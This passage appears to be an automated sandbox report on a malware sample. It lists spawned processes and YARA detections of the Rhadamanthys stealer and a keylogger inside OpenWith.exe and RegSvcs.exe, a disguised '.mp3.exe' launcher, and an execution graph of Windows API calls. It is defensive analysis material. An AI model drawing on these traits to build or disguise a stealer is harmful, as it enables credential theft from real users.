                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000002.1935619525.00000000060B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 0%, ReversingLabs
                                              Has exited:true

                                              Target ID:15
                                              Start time:07:45:21
                                              Start date:21/11/2024
                                              Path:C:\Windows\SysWOW64\OpenWith.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\system32\openwith.exe"
                                              Imagebase:0x1b0000
                                              File size:107'368 bytes
                                              MD5 hash:0ED31792A7FFF811883F80047CBCFC91
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000F.00000002.2946403129.0000000005A41000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000F.00000003.1961307501.0000000005639000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000F.00000003.1932421408.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:false

                                              Target ID:16
                                              Start time:07:45:25
                                              Start date:21/11/2024
                                              Path:C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
                                              Imagebase:0xd90000
                                              File size:947'288 bytes
                                              MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 0%, ReversingLabs
                                              Has exited:true

                                              Target ID:17
                                              Start time:07:45:34
                                              Start date:21/11/2024
                                              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                              Imagebase:0xd00000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000011.00000002.2068593152.00000000066C3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:true

                                              Target ID:18
                                              Start time:07:45:39
                                              Start date:21/11/2024
                                              Path:C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
                                              Imagebase:0xd90000
                                              File size:947'288 bytes
                                              MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:19
                                              Start time:07:45:47
                                              Start date:21/11/2024
                                              Path:C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
                                              Imagebase:0xd90000
                                              File size:947'288 bytes
                                              MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:20
                                              Start time:07:45:47
                                              Start date:21/11/2024
                                              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                              Imagebase:0x7e0000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000014.00000002.2208992211.00000000062C3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:true

                                              Target ID:21
                                              Start time:07:45:55
                                              Start date:21/11/2024
                                              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                              Imagebase:0x270000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000015.00000002.2287549394.0000000005FC3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:true

                                                Execution Graph

                                                Execution Coverage:10%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:10.8%
                                                Total number of Nodes:1939
                                                Total number of Limit Nodes:38
b2127b SendMessageW 28500->28499 28510 b14318 53 API calls 28501->28510 28501->28544 28507 b20a15 EndDialog 28502->28507 28502->28544 28743 b01ce2 28503->28743 28509 b11309 30 API calls 28504->28509 28505->28504 28507->28544 28512 b14318 53 API calls 28508->28512 28513 b212e3 GetDlgItem 28509->28513 28514 b2098d 28510->28514 28515 b20a53 SetDlgItemTextW 28512->28515 28517 b21302 28513->28517 28886 b01900 29 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 28514->28886 28516 b20a5f 28515->28516 28526 b20a68 GetMessageW 28516->28526 28516->28544 28858 b01e05 28517->28858 28519 b20b01 GetDlgItem 28521 b20b15 SendMessageW SendMessageW 28519->28521 28522 b20b38 SetFocus 28519->28522 28520 b20af5 28533 b2113a 28520->28533 28643 b20acb EndDialog 28520->28643 28521->28522 28527 b20b48 28522->28527 28528 b20b6f 28522->28528 28524 b20994 28530 b209a4 28524->28530 28537 b01de7 SetDlgItemTextW 28524->28537 28532 b20a7f IsDialogMessageW 28526->28532 28526->28544 28534 b14318 53 API calls 28527->28534 28536 b07673 28 API calls 28528->28536 28529 b2130c 28861 b1f2ce GetClassNameW 28529->28861 28530->28544 28887 b019a9 26 API calls 28530->28887 28531 b20ae4 28541 b01a66 26 API calls 28531->28541 28532->28516 28538 b20a8e TranslateMessage DispatchMessageW 28532->28538 28539 b14318 53 API calls 28533->28539 28540 b20b52 28534->28540 28543 b20b7b 28536->28543 28537->28530 28538->28516 28545 b2114b SetDlgItemTextW 28539->28545 28546 b014a7 28 API calls 28540->28546 28541->28544 28905 b234eb 28 API calls __EH_prolog3_GS 28543->28905 28888 b25796 28544->28888 28550 b21160 28545->28550 28551 b20b5b 28546->28551 28557 b14318 53 API calls 28550->28557 28891 b23572 28551->28891 28553 b20b88 28556 b14318 53 API calls 28553->28556 28555 b21346 28561 b21377 28555->28561 28564 b14318 53 API calls 28555->28564 28560 b20b9f 28556->28560 28562 b2117e 28557->28562 28558 b20b6a 28565 b01a66 26 API calls 28558->28565 28559 b21d4f 48 API calls 28559->28555 28563 b16a25 53 API calls 
28560->28563 28570 b21d4f 48 API calls 28561->28570 28670 b21490 28561->28670 28566 b014a7 28 API calls 28562->28566 28568 b20ba9 28563->28568 28569 b21359 SetDlgItemTextW 28564->28569 28571 b20bce 28565->28571 28572 b21187 28566->28572 28567 b21595 28578 b215a0 EnableWindow 28567->28578 28579 b215ad 28567->28579 28573 b23572 21 API calls 28568->28573 28574 b14318 53 API calls 28569->28574 28575 b2138d 28570->28575 28576 b20be0 28571->28576 28906 b23d64 26 API calls __EH_prolog3_GS 28571->28906 28577 b211f5 28572->28577 28590 b014a7 28 API calls 28572->28590 28580 b20bbb 28573->28580 28581 b2136d SetDlgItemTextW 28574->28581 28598 b213ad 28575->28598 28618 b213ce 28575->28618 28584 b20c07 28576->28584 28592 b0ed0d 49 API calls 28576->28592 28583 b14318 53 API calls 28577->28583 28578->28579 28586 b215c8 28579->28586 28923 b01cc4 GetDlgItem KiUserCallbackDispatcher 28579->28923 28588 b01a66 26 API calls 28580->28588 28581->28561 28589 b211ff 28583->28589 28757 b0eaf3 28584->28757 28585 b2147c 28593 b21d4f 48 API calls 28585->28593 28597 b215f0 28586->28597 28609 b215e8 SendMessageW 28586->28609 28588->28558 28599 b014a7 28 API calls 28589->28599 28591 b211a6 28590->28591 28603 b14318 53 API calls 28591->28603 28604 b20bfd 28592->28604 28593->28670 28595 b21560 28922 b1e265 34 API calls __EH_prolog3_GS 28595->28922 28597->28531 28610 b14318 53 API calls 28597->28610 28920 b1e265 34 API calls __EH_prolog3_GS 28598->28920 28600 b2120b 28599->28600 28614 b014a7 28 API calls 28600->28614 28601 b215bf 28924 b01cc4 GetDlgItem KiUserCallbackDispatcher 28601->28924 28629 b211b6 28603->28629 28604->28584 28611 b20c01 28604->28611 28605 b20c20 GetLastError 28606 b20c2b 28605->28606 28767 b12226 28606->28767 28609->28597 28616 b21609 SetDlgItemTextW 28610->28616 28907 b1fa79 25 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 28611->28907 28622 b21224 28614->28622 28615 b014a7 28 API calls 28615->28670 28616->28531 28618->28585 28623 b21d4f 48 API calls 
28618->28623 28619 b20c40 28624 b20c5d 28619->28624 28625 b20c4c GetLastError 28619->28625 28620 b21587 28621 b01a66 26 API calls 28620->28621 28626 b21593 28621->28626 28636 b01a66 26 API calls 28622->28636 28630 b21405 28623->28630 28627 b20cfd 28624->28627 28631 b20d0f 28624->28631 28632 b20c79 GetTickCount 28624->28632 28625->28624 28626->28567 28627->28631 28633 b21046 28627->28633 28628 b14318 53 API calls 28628->28670 28646 b01a66 26 API calls 28629->28646 28630->28585 28634 b2140e DialogBoxParamW 28630->28634 28638 b20f94 28631->28638 28645 b113f9 29 API calls 28631->28645 28770 b0325c 28632->28770 28802 b01e1f GetDlgItem ShowWindow 28633->28802 28634->28585 28639 b2142c EndDialog 28634->28639 28641 b21243 28636->28641 28638->28643 28918 b09733 28 API calls _wcslen 28638->28918 28639->28544 28647 b21448 28639->28647 28649 b01a66 26 API calls 28641->28649 28642 b2105b 28803 b01e1f GetDlgItem ShowWindow 28642->28803 28643->28531 28652 b20d39 28645->28652 28653 b211e9 28646->28653 28647->28544 28921 b019a9 26 API calls 28647->28921 28655 b2124e 28649->28655 28651 b20fae 28666 b14318 53 API calls 28651->28666 28908 b1505a 114 API calls 28652->28908 28658 b01a66 26 API calls 28653->28658 28654 b20c9f 28660 b01a66 26 API calls 28654->28660 28661 b01a66 26 API calls 28655->28661 28656 b21064 28662 b14318 53 API calls 28656->28662 28658->28577 28664 b20cab 28660->28664 28661->28531 28665 b2106e SetDlgItemTextW 28662->28665 28663 b20d51 28671 b16a25 53 API calls 28663->28671 28780 b0de9a 28664->28780 28804 b01e1f GetDlgItem ShowWindow 28665->28804 28669 b20fd4 28666->28669 28667 b01a66 26 API calls 28667->28670 28678 b01a66 26 API calls 28669->28678 28670->28567 28670->28595 28670->28615 28670->28628 28670->28667 28684 b20d80 GetCommandLineW 28671->28684 28672 b21082 SetDlgItemTextW GetDlgItem 28674 b210b7 28672->28674 28675 b2109f GetWindowLongW SetWindowLongW 28672->28675 28805 b21d4f 28674->28805 28675->28674 28682 b20fea 28678->28682 28679 b20ce0 28793 b0ddc7 
28679->28793 28680 b20cd5 GetLastError 28680->28679 28687 b01a66 26 API calls 28682->28687 28696 b20e05 _wcslen 28684->28696 28686 b21d4f 48 API calls 28689 b210ce 28686->28689 28690 b20ff6 28687->28690 28825 b23c78 28689->28825 28699 b14318 53 API calls 28690->28699 28692 b01a66 26 API calls 28692->28627 28694 b20e23 28910 b20405 5 API calls 2 library calls 28694->28910 28909 b20405 5 API calls 2 library calls 28696->28909 28698 b21d4f 48 API calls 28709 b210ef 28698->28709 28701 b2100c 28699->28701 28700 b20e2f 28911 b20405 5 API calls 2 library calls 28700->28911 28704 b014a7 28 API calls 28701->28704 28703 b21110 28919 b01cc4 GetDlgItem KiUserCallbackDispatcher 28703->28919 28705 b21015 28704->28705 28712 b01a66 26 API calls 28705->28712 28706 b20e3b 28912 b15109 114 API calls 28706->28912 28709->28703 28711 b21d4f 48 API calls 28709->28711 28710 b20e4e 28913 b23e53 28 API calls __EH_prolog3 28710->28913 28711->28703 28714 b21031 28712->28714 28716 b01a66 26 API calls 28714->28716 28715 b20e6b CreateFileMappingW 28717 b20ed5 ShellExecuteExW 28715->28717 28718 b20e9d MapViewOfFile 28715->28718 28716->28643 28720 b20ef3 28717->28720 28719 b20ed2 __InternalCxxFrameHandler 28718->28719 28719->28717 28721 b20f00 WaitForInputIdle 28720->28721 28722 b20f3d 28720->28722 28723 b20f1e 28721->28723 28725 b20f73 28722->28725 28726 b20f60 UnmapViewOfFile CloseHandle 28722->28726 28723->28722 28724 b20f23 Sleep 28723->28724 28724->28722 28724->28723 28914 b02e8b 28725->28914 28726->28725 28729 b01a66 26 API calls 28730 b20f83 28729->28730 28731 b01a66 26 API calls 28730->28731 28732 b20f8e 28731->28732 28732->28638 28734 b01ea6 28733->28734 28735 b01e4d 28733->28735 28926 b13e83 GetWindowLongW SetWindowLongW 28734->28926 28737 b01eb3 28735->28737 28925 b13eaa 64 API calls 3 library calls 28735->28925 28737->28491 28737->28492 28737->28544 28739 b01e6f 28739->28737 28740 b01e82 GetDlgItem 28739->28740 28740->28737 28741 b01e92 28740->28741 28741->28737 28742 b01e98 
SetWindowTextW 28741->28742 28742->28737 28927 b257d8 28743->28927 28745 b01cee GetDlgItem 28746 b01d0b 28745->28746 28747 b01d1d 28745->28747 28748 b014a7 28 API calls 28746->28748 28928 b01d64 28747->28928 28750 b01d18 28748->28750 28751 b01d4d 28750->28751 28752 b01a66 26 API calls 28750->28752 28753 b01d5a 28751->28753 28754 b01a66 26 API calls 28751->28754 28752->28751 28755 b25787 5 API calls 28753->28755 28754->28753 28756 b01d61 28755->28756 28756->28519 28756->28520 28756->28643 28763 b0eaff __EH_prolog3_GS 28757->28763 28758 b25787 5 API calls 28759 b0ebb6 28758->28759 28759->28605 28759->28606 28760 b0eb84 28761 b0efef 54 API calls 28760->28761 28764 b0eb09 28760->28764 28761->28764 28762 b0769f 45 API calls 28762->28763 28763->28760 28763->28762 28763->28764 28766 b01a66 26 API calls 28763->28766 28941 b0efef 28763->28941 28764->28758 28766->28763 28768 b12230 28767->28768 28769 b12232 SetCurrentDirectoryW 28767->28769 28768->28769 28769->28619 28771 b03280 28770->28771 28975 b02f0f 28771->28975 28774 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28775 b0329d 28774->28775 28776 b02f45 28775->28776 28777 b02f55 _wcslen 28776->28777 28979 b05962 28777->28979 28779 b02f63 28779->28654 28782 b0dea6 __EH_prolog3_GS 28780->28782 28781 b0def4 28784 b1169a 47 API calls 28781->28784 28792 b0df9e 28781->28792 28782->28781 28783 b0df09 CreateFileW 28782->28783 28783->28781 28786 b0df49 28784->28786 28785 b25787 5 API calls 28788 b0dfdf 28785->28788 28787 b0df6e 28786->28787 28789 b0df56 28786->28789 28790 b0df59 CreateFileW 28786->28790 28787->28792 28988 b019a9 26 API calls 28787->28988 28788->28679 28788->28680 28789->28790 28790->28787 28792->28785 28794 b0ddf8 28793->28794 28801 b0de09 28793->28801 28796 b0de04 28794->28796 28797 b0de0b 28794->28797 28794->28801 28795 b01a66 26 API calls 28798 b0de18 28795->28798 28989 b0dfe2 28796->28989 28994 b0de50 28797->28994 28798->28692 28801->28795 28802->28642 28803->28656 28804->28672 
28819 b21d5e __EH_prolog3_GS 28805->28819 28807 b2349a 28808 b01a66 26 API calls 28807->28808 28809 b234a5 28808->28809 28810 b25787 5 API calls 28809->28810 28811 b210c5 28810->28811 28811->28686 28812 b1645a 28 API calls 28812->28819 28813 b0769f 45 API calls 28813->28819 28814 b025a4 26 API calls 28814->28819 28815 b014a7 28 API calls 28815->28819 28819->28807 28819->28812 28819->28813 28819->28814 28819->28815 28820 b234ad 28819->28820 28823 b01a66 26 API calls 28819->28823 29015 b2030a 28819->29015 29019 b162cd 30 API calls 2 library calls 28819->29019 29020 b1f5b2 28 API calls 28819->29020 29021 b0adaa CompareStringW 28819->29021 29022 b244c0 26 API calls 28819->29022 29023 b058cb 45 API calls 28820->29023 28823->28819 28826 b23c87 __EH_prolog3_catch_GS _wcslen 28825->28826 29029 b16a89 28826->29029 28828 b23cba 29033 b07903 28828->29033 28837 b25796 5 API calls 28838 b210e0 28837->28838 28838->28698 29876 b1eaa6 28839->29876 28842 b237bf GetWindow 28843 b237d8 28842->28843 28846 b23885 28842->28846 28843->28846 28847 b237e5 GetClassNameW 28843->28847 28849 b23809 GetWindowLongW 28843->28849 28850 b2386d GetWindow 28843->28850 28844 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28845 b21266 28844->28845 28845->28499 28845->28500 28846->28844 29881 b18da4 CompareStringW 28847->29881 28849->28850 28851 b23819 SendMessageW 28849->28851 28850->28843 28850->28846 28851->28850 28852 b2382f GetObjectW 28851->28852 29882 b1eae5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28852->29882 28854 b23846 29883 b1eac4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28854->29883 29884 b1ef21 13 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 28854->29884 28857 b23857 SendMessageW DeleteObject 28857->28850 28859 b01e11 SetWindowTextW 28858->28859 28860 b01e0f 28858->28860 28859->28529 28860->28859 28862 b1f2f9 28861->28862 28869 b1f31e 28861->28869 29887 b18da4 CompareStringW 28862->29887 28863 b1f323 SHAutoComplete 28864 b1f32c 
28863->28864 28866 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28864->28866 28870 b1f337 28866->28870 28867 b1f30c 28868 b1f310 FindWindowExW 28867->28868 28867->28869 28868->28869 28869->28863 28869->28864 28871 b1fdd1 28870->28871 28872 b1fded 28871->28872 28873 b020b0 30 API calls 28872->28873 28874 b1fe27 28873->28874 29888 b02dbb 28874->29888 28877 b1fe43 28879 b0232c 123 API calls 28877->28879 28878 b1fe4c 29895 b0278b 28878->29895 28883 b1fe48 28879->28883 28882 b0232c 123 API calls 28882->28883 28884 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28883->28884 28885 b1fe77 28884->28885 28885->28555 28885->28559 28886->28524 28887->28544 28889 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28888->28889 28890 b257a0 28889->28890 28890->28890 28892 b20678 5 API calls 28891->28892 28893 b2358d GetDlgItem 28892->28893 28894 b235e4 SendMessageW SendMessageW 28893->28894 28895 b235ac 28893->28895 28896 b23643 SendMessageW 28894->28896 28897 b23624 28894->28897 28898 b235b7 ShowWindow SendMessageW SendMessageW 28895->28898 28899 b2365b 28896->28899 28900 b2365d SendMessageW SendMessageW 28896->28900 28897->28896 28898->28894 28899->28900 28901 b236a2 SendMessageW 28900->28901 28902 b2367f SendMessageW 28900->28902 28903 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28901->28903 28902->28901 28904 b236c0 28903->28904 28904->28558 28905->28553 28906->28576 28907->28584 28908->28663 28909->28694 28910->28700 28911->28706 28912->28710 28913->28715 28915 b02e93 28914->28915 28916 b02ea0 28914->28916 28917 b012a7 26 API calls 28915->28917 28916->28729 28917->28916 28918->28651 28919->28520 28920->28618 28921->28585 28922->28620 28923->28601 28924->28586 28925->28739 28926->28737 28927->28745 28939 b257d8 28928->28939 28930 b01d70 GetWindowTextLengthW 28940 b01bbd 28 API calls 28930->28940 28932 b01dab GetWindowTextW 28933 b014a7 28 API calls 28932->28933 28934 
b01dca 28933->28934 28935 b01ddd 28934->28935 28936 b012a7 26 API calls 28934->28936 28937 b25787 5 API calls 28935->28937 28936->28935 28938 b01de4 28937->28938 28938->28750 28939->28930 28940->28932 28943 b0effb __EH_prolog3_GS 28941->28943 28942 b0f02f 28945 b0ed0d 49 API calls 28942->28945 28943->28942 28944 b0f01b CreateDirectoryW 28943->28944 28944->28942 28946 b0f0d0 28944->28946 28949 b0f03b 28945->28949 28947 b0f0df 28946->28947 28960 b0f58b 28946->28960 28953 b25787 5 API calls 28947->28953 28948 b0f0e3 GetLastError 28948->28947 28949->28948 28951 b1169a 47 API calls 28949->28951 28952 b0f063 28951->28952 28954 b0f07d 28952->28954 28956 b0f070 28952->28956 28957 b0f073 CreateDirectoryW 28952->28957 28955 b0f100 28953->28955 28959 b0f0ad 28954->28959 28973 b019a9 26 API calls 28954->28973 28955->28763 28956->28957 28957->28954 28959->28946 28959->28948 28961 b0f597 __EH_prolog3_GS 28960->28961 28962 b0f5a4 SetFileAttributesW 28961->28962 28963 b0f5b7 28962->28963 28972 b0f622 28962->28972 28964 b1169a 47 API calls 28963->28964 28967 b0f5d7 28964->28967 28965 b25787 5 API calls 28966 b0f638 28965->28966 28966->28947 28968 b0f5f6 28967->28968 28969 b0f5e4 28967->28969 28970 b0f5e7 SetFileAttributesW 28967->28970 28968->28972 28974 b019a9 26 API calls 28968->28974 28969->28970 28970->28968 28972->28965 28973->28959 28974->28972 28976 b02f26 28975->28976 28977 b02f2f 28975->28977 28976->28774 28978 b0120c 28 API calls 28977->28978 28978->28976 28980 b05975 28979->28980 28981 b05a3a 28979->28981 28985 b05987 28980->28985 28986 b03029 28 API calls 28980->28986 28987 b058cb 45 API calls 28981->28987 28985->28779 28986->28985 28988->28792 28990 b0e015 28989->28990 28991 b0dfeb 28989->28991 28990->28801 28991->28990 29000 b0ec63 28991->29000 28995 b0de76 28994->28995 28996 b0de5c 28994->28996 28997 b0de95 28995->28997 29014 b0925b 109 API calls 28995->29014 28996->28995 28998 b0de68 CloseHandle 28996->28998 28997->28801 28998->28995 29001 b0ec6f __EH_prolog3_GS 
29000->29001 29002 b0ec7c DeleteFileW 29001->29002 29003 b0ec8c 29002->29003 29011 b0ecf4 29002->29011 29005 b1169a 47 API calls 29003->29005 29004 b25787 5 API calls 29006 b0e013 29004->29006 29007 b0ecac 29005->29007 29006->28801 29008 b0ecc8 29007->29008 29009 b0ecb9 29007->29009 29010 b0ecbc DeleteFileW 29007->29010 29008->29011 29013 b019a9 26 API calls 29008->29013 29009->29010 29010->29008 29011->29004 29013->29011 29014->28997 29016 b20324 29015->29016 29017 b2031d 29015->29017 29016->29017 29024 b01b63 29016->29024 29017->28819 29019->28819 29020->28819 29021->28819 29022->28819 29025 b01b8e 29024->29025 29026 b01b6f 29024->29026 29028 b013f7 28 API calls 29025->29028 29026->29016 29028->29026 29030 b16a99 _wcslen 29029->29030 29031 b01be3 28 API calls 29030->29031 29032 b16abb 29031->29032 29032->28828 29034 b16a74 29033->29034 29035 b16a89 28 API calls 29034->29035 29036 b16a86 29035->29036 29037 b0b03d 29036->29037 29038 b0b049 __EH_prolog3_GS 29037->29038 29084 b12815 29038->29084 29040 b0b092 29090 b0b231 29040->29090 29043 b01a66 26 API calls 29044 b0b120 29043->29044 29045 b01a66 26 API calls 29044->29045 29046 b0b128 29045->29046 29047 b256f6 28 API calls 29046->29047 29048 b0b13f 29047->29048 29095 b1a599 29048->29095 29050 b0b172 29051 b25787 5 API calls 29050->29051 29052 b0b179 29051->29052 29053 b0b3e1 29052->29053 29054 b0b3ed __EH_prolog3_GS 29053->29054 29055 b0b484 29054->29055 29056 b0b478 29054->29056 29135 b0f711 29054->29135 29059 b0b4e0 29055->29059 29102 b0bc65 29055->29102 29057 b01a66 26 API calls 29056->29057 29057->29055 29060 b0b529 29059->29060 29142 b0204b 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29059->29142 29062 b25787 5 API calls 29060->29062 29063 b0b543 29062->29063 29065 b0b194 29063->29065 29820 b0d6bc 29065->29820 29068 b0b1d0 29070 b01a66 26 API calls 29068->29070 29071 b0b1e8 29070->29071 29072 b01a66 26 API calls 29071->29072 29073 b0b1f3 29072->29073 29074 b01a66 26 API calls 
29073->29074 29075 b0b1fe 29074->29075 29834 b128aa 29075->29834 29077 b0b206 29078 b01a66 26 API calls 29077->29078 29079 b0b20e 29078->29079 29080 b01a66 26 API calls 29079->29080 29081 b0b216 29080->29081 29082 b0d869 26 API calls 29081->29082 29083 b0b21d 29082->29083 29083->28837 29085 b12821 __EH_prolog3 29084->29085 29086 b256f6 28 API calls 29085->29086 29087 b1285f 29086->29087 29088 b256f6 28 API calls 29087->29088 29089 b12883 29088->29089 29089->29040 29091 b025a4 26 API calls 29090->29091 29092 b0b23f 29091->29092 29093 b025a4 26 API calls 29092->29093 29094 b0b118 29093->29094 29094->29043 29096 b1a5a5 __EH_prolog3 29095->29096 29097 b256f6 28 API calls 29096->29097 29098 b1a5bf 29097->29098 29100 b1a5d6 29098->29100 29101 b17445 112 API calls 29098->29101 29100->29050 29101->29100 29103 b0bc80 29102->29103 29143 b020b0 29103->29143 29105 b0bca7 29106 b0bcba 29105->29106 29365 b0e910 29105->29365 29110 b0bcec 29106->29110 29153 b027e0 29106->29153 29109 b0bce8 29109->29110 29177 b02d41 160 API calls __EH_prolog3_GS 29109->29177 29342 b0232c 29110->29342 29116 b0bd14 29117 b0be08 29116->29117 29118 b07673 28 API calls 29116->29118 29178 b0bec2 7 API calls 29117->29178 29120 b0bd36 29118->29120 29369 b11e54 46 API calls 2 library calls 29120->29369 29122 b0be16 29124 b0be76 29122->29124 29179 b1864f 29122->29179 29123 b0f711 53 API calls 29130 b0bd53 29123->29130 29124->29110 29182 b052d8 29124->29182 29194 b0bf3d 29124->29194 29125 b0bde8 29129 b01a66 26 API calls 29125->29129 29128 b01a66 26 API calls 29128->29130 29131 b0bded 29129->29131 29130->29123 29130->29125 29130->29128 29370 b11e54 46 API calls 2 library calls 29130->29370 29134 b01a66 26 API calls 29131->29134 29134->29117 29136 b11a9f 5 API calls 29135->29136 29137 b0f723 29136->29137 29138 b0f74b 29137->29138 29795 b0f826 29137->29795 29138->29054 29141 b0f738 FindClose 29141->29138 29142->29060 29144 b020bc __EH_prolog3 29143->29144 29145 b12815 28 API calls 29144->29145 29146 b020e8 
29145->29146 29147 b256f6 28 API calls 29146->29147 29151 b02193 29146->29151 29149 b02180 29147->29149 29149->29151 29371 b076e7 29149->29371 29379 b1026f 29151->29379 29152 b02227 __cftof 29152->29105 29154 b027ec __EH_prolog3 29153->29154 29155 b011dd 28 API calls 29154->29155 29159 b02838 29154->29159 29174 b0298b 29154->29174 29160 b02882 29155->29160 29156 b029a9 29408 b0204b 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29156->29408 29158 b052d8 133 API calls 29164 b029f4 29158->29164 29159->29156 29161 b029b6 29159->29161 29175 b0e850 111 API calls 29160->29175 29161->29158 29161->29174 29162 b02a3c 29166 b02a6f 29162->29166 29162->29174 29409 b0204b 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29162->29409 29164->29162 29165 b052d8 133 API calls 29164->29165 29165->29164 29166->29174 29176 b0e850 111 API calls 29166->29176 29167 b02995 29170 b02e8b 26 API calls 29167->29170 29168 b02986 29169 b02e8b 26 API calls 29168->29169 29169->29174 29170->29159 29171 b052d8 133 API calls 29173 b02ac0 29171->29173 29172 b028ad 29172->29167 29172->29168 29173->29171 29173->29174 29174->29109 29175->29172 29176->29173 29177->29116 29178->29122 29410 b24300 29179->29410 29183 b052e4 29182->29183 29184 b052e8 29182->29184 29183->29124 29193 b0e850 111 API calls 29184->29193 29185 b052fa 29186 b05323 29185->29186 29187 b05315 29185->29187 29437 b03d9d 131 API calls 3 library calls 29186->29437 29188 b05355 29187->29188 29436 b048aa 118 API calls 2 library calls 29187->29436 29188->29124 29191 b05321 29191->29188 29438 b0344b 89 API calls 29191->29438 29193->29185 29195 b0bf95 29194->29195 29200 b0bfc4 29195->29200 29207 b0c2fd 29195->29207 29536 b1cdb4 135 API calls __EH_prolog3_GS 29195->29536 29197 b0d2e5 29198 b0d331 29197->29198 29199 b0d2ea 29197->29199 29198->29207 29608 b1cdb4 135 API calls __EH_prolog3_GS 29198->29608 29199->29207 29607 b0ab88 185 API calls 29199->29607 29200->29197 29205 b0bfeb 29200->29205 29200->29207 
